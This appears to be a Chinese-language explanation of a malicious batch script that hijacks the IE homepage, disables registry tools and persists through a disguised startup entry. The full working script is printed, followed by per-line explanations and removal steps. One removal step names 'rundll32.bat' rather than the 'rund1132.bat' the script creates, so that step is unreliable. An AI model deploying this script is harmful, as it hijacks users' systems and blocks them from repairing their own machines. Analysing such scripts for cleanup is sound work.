@echo off
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.xxxx.com" /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /f
copy %0 %windir%\System32\rund1132.bat
注册表中还添加了一个名为ctfmom的系统开机启动任务,用户每次登录后会自动执行上述代码。这样即使已解除注册表锁定、修复IE主页,若不清理此启动项,则重新开机后危害依旧
解释代码:
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.xxxx.com" /f 设置起始页 第一个参数为注册表路径 /v设置名称 /d 键值 /f强制覆盖
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f 锁定主页
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f 锁定注册表
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /f 添加启动项
消除恶意程序
删除文件C:\Windows\System32\rundll32.bat
运行gpedit.msc组策略编辑器
用户配置-->管理模板-->系统,将“阻止访问注册表工具”设为“已禁用”
用户配置-->管理模板-->Windows组件-->Internet Explorer,将“禁止更改主页设置”设为“已禁用”
编辑注册表,删除开机启动项“ctfmom”
重新打开Internet Explorer浏览器,修复主页设置
命令行中regedit进入编辑注册表可查看